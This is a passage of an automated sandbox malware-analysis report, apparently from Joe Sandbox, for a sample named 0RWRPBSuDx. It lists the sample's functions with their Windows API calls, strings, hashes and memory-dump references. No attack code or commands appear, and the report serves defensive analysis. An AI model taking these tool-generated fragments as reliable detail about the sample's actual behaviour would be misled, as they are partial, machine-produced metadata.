                                                                          • Opcode Fuzzy Hash: 5f65020aef3fb45fb11887bb1f6e63c6b85ff76842c9e0dedd88080743c31966
                                                                          • Instruction Fuzzy Hash: 95318871A0160DAFDF10EF66CC41ADEBBBCDB45304F5084B7A808A32A1D7389E45CE58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00455448 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004554C5
                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004554EC
                                                                          • SetForegroundWindow.USER32(?), ref: 004554FD
                                                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,004557D7,?,00000000,00455813), ref: 004557C2
                                                                          Strings
                                                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00455642
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                          • API String ID: 2236967946-3182603685
                                                                          • Opcode ID: dc33ace31ed7a9797ae01e48b88653b806302b7cb0691c2facf87cd2e3786102
                                                                          • Instruction ID: 0e8bbef3c373df75fc6cad67ac7c13520a564414c71ee93b02e72d74791e7f0d
                                                                          • Opcode Fuzzy Hash: dc33ace31ed7a9797ae01e48b88653b806302b7cb0691c2facf87cd2e3786102
                                                                          • Instruction Fuzzy Hash: EA910034604A44EFD715CF64D961F6ABBF5EB8D704F2080BAE90897792C738AE05CB18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00454574 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,004546A8), ref: 004545A4
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004545AA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                          • API String ID: 1646373207-3712701948
                                                                          • Opcode ID: ed7d07240aa90892a091206af18c35f348ebfaa97add39f3b53ca1f61f412ce1
                                                                          • Instruction ID: ea8d5c54c38255325536962d047065f6d17d79332955beca5d267283e39a3316
                                                                          • Opcode Fuzzy Hash: ed7d07240aa90892a091206af18c35f348ebfaa97add39f3b53ca1f61f412ce1
                                                                          • Instruction Fuzzy Hash: 27317371A04249ABCB01DFA5D882ADFB7F8EF49704F504567E800F7292D67C5D088A68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417C40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417C7F
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID: ,
                                                                          • API String ID: 568898626-3772416878
                                                                          • Opcode ID: 5ece517c437fe019085fbf139a94efe96b230f489b8065151ca60217286486e9
                                                                          • Instruction ID: c7e48a005123f112bfb3c773aae920d88014dc0855fb7fe4f04d55f6c4297c8c
                                                                          • Opcode Fuzzy Hash: 5ece517c437fe019085fbf139a94efe96b230f489b8065151ca60217286486e9
                                                                          • Instruction Fuzzy Hash: 92213E71604204ABCF00EF69D8C4ADA77B8AF48314F11456AFD18DF346D678E984CBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004601DC Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00460399), ref: 0046020D
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 0046029C
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046034E,?,00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 0046032E
                                                                          • FindClose.KERNEL32(000000FF,00460355,0046034E,?,00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 00460348
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: 5588b96bc5821cb24b794ae90af1c2edfe00c633003d91bf40660c77ef646330
                                                                          • Instruction ID: c22440ca7c527640d667828617bb25d04212bcbd0bedb4656b6a98293150bfae
                                                                          • Opcode Fuzzy Hash: 5588b96bc5821cb24b794ae90af1c2edfe00c633003d91bf40660c77ef646330
                                                                          • Instruction Fuzzy Hash: 3E419930A046189FCB11EF65DC55ADEB7B8EB48705F4044FAF804EB391E67C9E888E59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00460658 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,0046083F), ref: 004606CD
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 00460713
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,004607EC,?,00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 004607C8
                                                                          • FindClose.KERNEL32(000000FF,004607F3,004607EC,?,00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 004607E6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: 4b6b058d118e51379d164b2f39e0688468813194ab15f3d47b27d756da6eea37
                                                                          • Instruction ID: 403a6866901340eb541ce2889c412c5575f061829704f8cbc5206a85907b83c4
                                                                          • Opcode Fuzzy Hash: 4b6b058d118e51379d164b2f39e0688468813194ab15f3d47b27d756da6eea37
                                                                          • Instruction Fuzzy Hash: 68416335A006189BCB11EF65DC859DFB7B8EB88305F5044BAF804A7351E77CAE448E59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042E6DC Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E6FE
                                                                          • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E729
                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E736
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E73E
                                                                          • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E744
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                          • String ID:
                                                                          • API String ID: 1177325624-0
                                                                          • Opcode ID: 49bff7004518e71781683ab0b22e1c86a9f508c12aad9e85268bd182f546215a
                                                                          • Instruction ID: d5c332dd154d0a6876031c1b9749a0de84ba629fdfa8bcc8c87bd6e344ced3d8
                                                                          • Opcode Fuzzy Hash: 49bff7004518e71781683ab0b22e1c86a9f508c12aad9e85268bd182f546215a
                                                                          • Instruction Fuzzy Hash: AAF0F0B13917207AF620B17A6CC6F7B018CC7C5B68F10823ABB04FF1C1D9A84D05056D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0047DB50 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 0047DB8E
                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0047DBAC
                                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,00494F8C,0047D3DA,0047D40E,00000000,0047D42E,?,?,00000001,00494F8C), ref: 0047DBCE
                                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,00494F8C,0047D3DA,0047D40E,00000000,0047D42E,?,?,00000001,00494F8C), ref: 0047DBE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$IconicLong
                                                                          • String ID:
                                                                          • API String ID: 2754861897-0
                                                                          • Opcode ID: 369b3e18d2165cb8bb48b2587b96ca03a768cff027144c2cea394ed926353b1c
                                                                          • Instruction ID: c4c813b94ba675872cbc2921d165099fe1b58c154ab1beafddf731999e56589c
                                                                          • Opcode Fuzzy Hash: 369b3e18d2165cb8bb48b2587b96ca03a768cff027144c2cea394ed926353b1c
                                                                          • Instruction Fuzzy Hash: 5A017170B142819BD700A7B5DC45F9627B85F01318F16847BB4469F3ABCB2DAC42D61C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045EC50 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0045ED24), ref: 0045ECA8
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045ED04,?,00000000,?,00000000,0045ED24), ref: 0045ECE4
                                                                          • FindClose.KERNEL32(000000FF,0045ED0B,0045ED04,?,00000000,?,00000000,0045ED24), ref: 0045ECFE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 4c8216cd23e0ad7c597990ef92a379c131d9d30fe178f8c8937ccab258ab8b35
                                                                          • Instruction ID: 1c15e069fa90e75a86647c5f7c03675f72fe807dda2d2eae08813ce46935d9d4
                                                                          • Opcode Fuzzy Hash: 4c8216cd23e0ad7c597990ef92a379c131d9d30fe178f8c8937ccab258ab8b35
                                                                          • Instruction Fuzzy Hash: DA21C931504608AEDB15DB67DC41ADEB7BCEB49704F5084F7FC08D22A2D6389B48C959
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0042414C Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00424154
                                                                          • SetActiveWindow.USER32(?,?,?,004687FC), ref: 00424161
                                                                            • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                            • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042417A,?,?,?,004687FC), ref: 00423ABF
                                                                          • SetFocus.USER32(00000000,?,?,?,004687FC), ref: 0042418E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveFocusIconicShow
                                                                          • String ID:
                                                                          • API String ID: 649377781-0
                                                                          • Opcode ID: 826e83aebfae97061b379bc16a5d1b84d700d2e627d919f03dfb4d2f52cb7ad2
                                                                          • Instruction ID: 52aae3a4689a9740bd4d9c6d6ebd89914a33ab6eb49489b11b5c27e09e1b84ad
                                                                          • Opcode Fuzzy Hash: 826e83aebfae97061b379bc16a5d1b84d700d2e627d919f03dfb4d2f52cb7ad2
                                                                          • Instruction Fuzzy Hash: 6CF03A717001209BDB00AFAAD8C4B9633A8AF48304B55017BBD09EF34BCA7CDC5187A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417C3E Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417C7F
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID:
                                                                          • API String ID: 568898626-0
                                                                          • Opcode ID: 417382ec3429889133b32bde4c00db047fc4eacd7573cf41adb8130d41789b22
                                                                          • Instruction ID: f0313cfea0d4087130c3a657ee055cc65a4736f61d4b278e94d42609036002a6
                                                                          • Opcode Fuzzy Hash: 417382ec3429889133b32bde4c00db047fc4eacd7573cf41adb8130d41789b22
                                                                          • Instruction Fuzzy Hash: 31015A31204104ABDF10EE6A98C5EEA73A8AF44324F114166FD08CF342E638EC8086A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00417508 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureIconic
                                                                          • String ID:
                                                                          • API String ID: 2277910766-0
                                                                          • Opcode ID: c2a33cdbbae1cdfc2369431b38ce0fc9041f94e7b113fc5137cb4b1fd2442c1e
                                                                          • Instruction ID: 2956aca8664544b1eb357884f6cb47590399079b6183512574be6b3802fdb23b
                                                                          • Opcode Fuzzy Hash: c2a33cdbbae1cdfc2369431b38ce0fc9041f94e7b113fc5137cb4b1fd2442c1e
                                                                          • Instruction Fuzzy Hash: 02F0A471B04602A7DB20E72EC8C4AA762F69F84394B54403BF415C7B96EA7CDCC08318
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00424104 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 0042410B
                                                                            • Part of subcall function 004239F4: EnumWindows.USER32(0042398C), ref: 00423A18
                                                                            • Part of subcall function 004239F4: GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                            • Part of subcall function 004239F4: GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                            • Part of subcall function 004239F4: SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                          • SetActiveWindow.USER32(?,?,?,00423CE3,00000000,004240CC), ref: 0042411F
                                                                            • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                          • String ID:
                                                                          • API String ID: 2671590913-0
                                                                          • Opcode ID: c74fb73a8881fd60f3fd614903c11219e2ccc8bc78df243e72f47ccd7f1af9d0
                                                                          • Instruction ID: b8e4b42960b6b3797255afb6d30997fccd36cf0c86298b6f3b138aeb4614201e
                                                                          • Opcode Fuzzy Hash: c74fb73a8881fd60f3fd614903c11219e2ccc8bc78df243e72f47ccd7f1af9d0
                                                                          • Instruction Fuzzy Hash: 76E0E5A0300100C7EB00AFAAD8C9B9672A9BB48304F5501BABC08CF24BD6B8C8948724
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00412548 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00412745), ref: 00412733
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 5ac7982fb39f62f6f70c044b616f6008bafcba18ee83e8967f3a98960c284c43
                                                                          • Instruction ID: 8365c716c5e730cb372343108a6f593a498c89545a1faf81556fc105b3597b40
                                                                          • Opcode Fuzzy Hash: 5ac7982fb39f62f6f70c044b616f6008bafcba18ee83e8967f3a98960c284c43
                                                                          • Instruction Fuzzy Hash: 8B51D3356042059FC710DF5AD681A9BF3E5FF98304B3582ABE814C77A1D6B8AD92874C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00473A10 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00473B5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: ce54198750e36d2c75895016167de93e0fa029d34df70342d56a8510856625dc
                                                                          • Instruction ID: 3e32aa5f128dc23a8b701fa4ecba52860cdafcd953849f4bd8a959afbbddc411
                                                                          • Opcode Fuzzy Hash: ce54198750e36d2c75895016167de93e0fa029d34df70342d56a8510856625dc
                                                                          • Instruction Fuzzy Hash: 1F415775B08104DFCB10CF99C6819AAB7F5EB48312B24C596E848DB746D338EF41EB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045B560 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045B56B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: e51d4a8b77d663dbf5753caff9afe7d0a369bc5209e9a7b4c4ce857bc8fe2f36
                                                                          • Instruction ID: 9e8eafa16c368b04bfc03e3690b6b42464bb4fe35b2110d8adbf47a9256d09ee
                                                                          • Opcode Fuzzy Hash: e51d4a8b77d663dbf5753caff9afe7d0a369bc5209e9a7b4c4ce857bc8fe2f36
                                                                          • Instruction Fuzzy Hash: 07C09BF200520C7F65005795ECC9CB7B75CE6DC7657404126F6044210195716C508574
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0045B578 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,00469597), ref: 0045B57E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CryptFour
                                                                          • String ID:
                                                                          • API String ID: 2153018856-0
                                                                          • Opcode ID: c66c785d08d772f28e3adc9bfa18a8b196b3a7f7ba0323c99685d538528cd14f
                                                                          • Instruction ID: 5f2732264b6577c6f22f747bc4abd170fb833af863f4cd36b72278e664c57c22
                                                                          • Opcode Fuzzy Hash: c66c785d08d772f28e3adc9bfa18a8b196b3a7f7ba0323c99685d538528cd14f
                                                                          • Instruction Fuzzy Hash: E1A002B0A813057AFD6057609D0EF26262C97D4F05F2144697201E90D485A86441C52C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2868493918.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.2868472129.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2868511858.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
